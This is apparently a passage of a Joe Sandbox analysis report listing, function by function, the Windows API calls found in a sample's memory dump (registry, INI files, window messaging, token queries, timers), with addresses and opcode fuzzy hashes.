                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002203C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0022040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0022043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 965ae0c3be4657336b75ce2b5548b0910332aa25b0dbbc5eead34325ac017f3a
                                                            • Instruction ID: ae051c1780f878fa2fedf67a2ae8d4846661f4253d379b79241da6cb3d8c1099
                                                            • Opcode Fuzzy Hash: 965ae0c3be4657336b75ce2b5548b0910332aa25b0dbbc5eead34325ac017f3a
                                                            • Instruction Fuzzy Hash: 80516B31218205AFD704EFA4EC85F6EB7E8FF94304F04896DB595872A2DB70EA15CB52
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0020E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0020E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0020E8F2
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0020E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0020E91F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a1eac6ba0f322d228c37c8fafbc255061bd2a5cd94ad07e8726a849d0f7c7da7
                                                            • Instruction ID: e146c67a8cd00ef2248111b6092efe0ecf063703dc27114c3174d7533933dbdb
                                                            • Opcode Fuzzy Hash: a1eac6ba0f322d228c37c8fafbc255061bd2a5cd94ad07e8726a849d0f7c7da7
                                                            • Instruction Fuzzy Hash: 5F514039A00205EFCF11DF64C98196EBBF5FF19314B1484A9E809AB362DB31ED51CB50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9320d3134e615aef50155b904e398bbaa0bda6bcbe77a0951144a2160c04213
                                                            • Instruction ID: 8d00f880bebc818e6285f2cf1bab57883728f6155678550b9843f176fcc2cce5
                                                            • Opcode Fuzzy Hash: f9320d3134e615aef50155b904e398bbaa0bda6bcbe77a0951144a2160c04213
                                                            • Instruction Fuzzy Hash: AF412635920125FFC720DFA8EC48FE9BBA8EB09310F1441A5F815A76E0C7B0AD61DA91
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 001A2357
                                                            • ScreenToClient.USER32(002667B0,?), ref: 001A2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 001A2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 001A23A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 66f61e5b509e3187a0c1efafe158166dbbd0250655c490b38e0bd4cb590eef37
                                                            • Instruction ID: 48008ecf44ba73ddb99263557f3e9ce01122927bb8b9558db5d22213b165065a
                                                            • Opcode Fuzzy Hash: 66f61e5b509e3187a0c1efafe158166dbbd0250655c490b38e0bd4cb590eef37
                                                            • Instruction Fuzzy Hash: F141827550411AFBDF199FA8D848AEEBB74FF0A720F20436AF82992290C7346954DF91
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 001F69A9
                                                            • TranslateMessage.USER32(?), ref: 001F69D2
                                                            • DispatchMessageW.USER32(?), ref: 001F69DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F69EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: e8336a15de4b8296ffa409bc5506f0fe0288cda30dbbe8c7c5450211cca49f0b
                                                            • Instruction ID: 2f06bdc1a55f87046b75aa1e17ab04663d090e9ebb43b43eca170e16750c0a53
                                                            • Opcode Fuzzy Hash: e8336a15de4b8296ffa409bc5506f0fe0288cda30dbbe8c7c5450211cca49f0b
                                                            • Instruction Fuzzy Hash: 1B31C57150024AAEDB65CF74AC4CFB6BBBCFB11308F148169E621D30A1D7B59889D7A0
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 001F8F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 001F8FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001F8FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 001F8FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001F8FDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 62c0f7c1b5266076235b2b4df47cc19ad4ecf28466bd1218fe405e9a2995baf2
                                                            • Instruction ID: 4bfcf3efbbfda35c5aa1f5213cdffaf5374348b00db56875fc7158c9ef6d02af
                                                            • Opcode Fuzzy Hash: 62c0f7c1b5266076235b2b4df47cc19ad4ecf28466bd1218fe405e9a2995baf2
                                                            • Instruction Fuzzy Hash: 9E31AE7150021DEFDF24CFA8EE4DAAE7BB6EB44315F104229FA25EA1D0C7B09914DB91
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 001FB6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001FB6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001FB71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001FB742
                                                            • _wcsstr.LIBCMT ref: 001FB74C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: e0ae9c3a5e3a1741bc34aa8bb33b76d48d45a6c9aa4b8bfdb8645541455db119
                                                            • Instruction ID: 8b43dd3cf706912eea08d5652aff4d9158608251be7f456d547048498c52a718
                                                            • Opcode Fuzzy Hash: e0ae9c3a5e3a1741bc34aa8bb33b76d48d45a6c9aa4b8bfdb8645541455db119
                                                            • Instruction Fuzzy Hash: 4A210731208208BBEB256B79ED89E7B7BACDF59720F10413DFD05CA1A1EB61DC4196A0
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0022B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0022B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0022B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00211184,00000000), ref: 0022B4D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: cfc10345a77e812126b1e9266759540cefaec30af7398be9865aaf555c7648b8
                                                            • Instruction ID: e0288410ee702c3f256caa9ef361f33273f2be5c11f7769abe3100d162a3c949
                                                            • Opcode Fuzzy Hash: cfc10345a77e812126b1e9266759540cefaec30af7398be9865aaf555c7648b8
                                                            • Instruction Fuzzy Hash: 4721A631920226BFCB21AFB8EC98A6677A4FB05721F144734F925D71E1E7709831DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001F9802
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001F9834
                                                            • __itow.LIBCMT ref: 001F984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001F9874
                                                            • __itow.LIBCMT ref: 001F9885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: dc188f020c7022f464e0f68b009e2cb11151e1dc2ffc0418308411e8fb5acb0a
                                                            • Instruction ID: a91d83a88f043dd509db888c5af2c485c7964855a6537c72e0c972462df4b418
                                                            • Opcode Fuzzy Hash: dc188f020c7022f464e0f68b009e2cb11151e1dc2ffc0418308411e8fb5acb0a
                                                            • Instruction Fuzzy Hash: 1821B67560020CBBDB20AAA59C8AFFE7BA8DF5A760F084039FA049B291D7708D4587D1
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                            • SelectObject.GDI32(?,00000000), ref: 001A135C
                                                            • BeginPath.GDI32(?), ref: 001A1373
                                                            • SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: ed1636da22b3087965c3c1d6b099d6d6f4642255e20da1bb07d9a91ffad75bbf
                                                            • Instruction ID: 0208bff2082112eaf10adc6e23c228fefa41e81ac8388aef787ee8496849c82e
                                                            • Opcode Fuzzy Hash: ed1636da22b3087965c3c1d6b099d6d6f4642255e20da1bb07d9a91ffad75bbf
                                                            • Instruction Fuzzy Hash: FA214875800208FBDF118F65ED0CBA97BB8FB01321F248226E810971A0D3B1999ADB90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: c890126912dfee178ee73b2bd24664fc09e720dd238055ebb78114f177c972f5
                                                            • Instruction ID: cb5d7572e7de65ac9868c09ed5b09eed24ea4320b74733c5d0daa9aa84c89c79
                                                            • Opcode Fuzzy Hash: c890126912dfee178ee73b2bd24664fc09e720dd238055ebb78114f177c972f5
                                                            • Instruction Fuzzy Hash: A801B5B1A4811DFBE208E6209E52FBB739C9B32394F054025FE0497283E790EE3592E0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00204D5C
                                                            • __beginthreadex.LIBCMT ref: 00204D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00204D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00204DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00204DAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 91447d24e21d3d7054e37ddae7b9788c63065afc074c8750aecf293af3d5ef45
                                                            • Instruction ID: 26bbc5cc7830fde0e63bb033970928e4140e75ae16499485629f23c16f0dd7b1
                                                            • Opcode Fuzzy Hash: 91447d24e21d3d7054e37ddae7b9788c63065afc074c8750aecf293af3d5ef45
                                                            • Instruction Fuzzy Hash: 9611E5B2914346BBC7119FB8AC0CA9A7BACEB45324F148269FD14D3291D6B18D1087A0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                            • GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                            • HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: f7d3056261d1865847ffefd604507a7610c9ceef096fd82e9514eb4dc0dd7992
                                                            • Instruction ID: 17bb67de198adaa20c91407d3f5353fb3b4e0b2b2e4651e71d2fcbea76af4206
                                                            • Opcode Fuzzy Hash: f7d3056261d1865847ffefd604507a7610c9ceef096fd82e9514eb4dc0dd7992
                                                            • Instruction Fuzzy Hash: DD012871600208BF9B205FE6ED8D9ABBBBCEF897557200579F949C2260DB318C12CA60
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00205502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00205510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00205518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00205522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0020555E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: aaf2c3837c32356a8af890dbca30b5c40f52de0274310bcfb976948125b31d35
                                                            • Instruction ID: bb9373aaf84ddb2afd7ea6e7b6717ec7811cf08b6fdf793ae4eae07777939203
                                                            • Opcode Fuzzy Hash: aaf2c3837c32356a8af890dbca30b5c40f52de0274310bcfb976948125b31d35
                                                            • Instruction Fuzzy Hash: 09016135C10A29EBDF10DFE8ED4D6EEBB78FB09701F800066E905B2181DB305561CBA1
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?,?,001F799D), ref: 001F766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F7698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?), ref: 001F76A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001F758C,80070057,?,?), ref: 001F76B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: ccd09982e7b0a7bcfc32f9bc57bcdd9a726c8596ac185583ef9e84a8604b2382
                                                            • Instruction ID: 81fc0422a4ab97dc38c773deb5adfaac13bd9dd92e5811064750a134c589f4b4
                                                            • Opcode Fuzzy Hash: ccd09982e7b0a7bcfc32f9bc57bcdd9a726c8596ac185583ef9e84a8604b2382
                                                            • Instruction Fuzzy Hash: A10184B2601608BBEB209F58ED48BBABBBDEB45761F140038FE04D6251E771DD4197A0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F8608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F8612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F8621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F8628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F863E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 2fce51a8da69fd8a5a380133dee4c7fd918793644561973a019e2aacacdba847
                                                            • Instruction ID: 65f926121bb749a2671bf888d721bd5f253485a511c75eee713ac897f6e84682
                                                            • Opcode Fuzzy Hash: 2fce51a8da69fd8a5a380133dee4c7fd918793644561973a019e2aacacdba847
                                                            • Instruction Fuzzy Hash: 12F03C31201218BFEB200FE9ED8DEBB3BADEF89764B400435FA49C6150CB719C42DA60
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 001F8669
                                                            • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 001F8673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 001F8682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 001F8689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 001F869F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
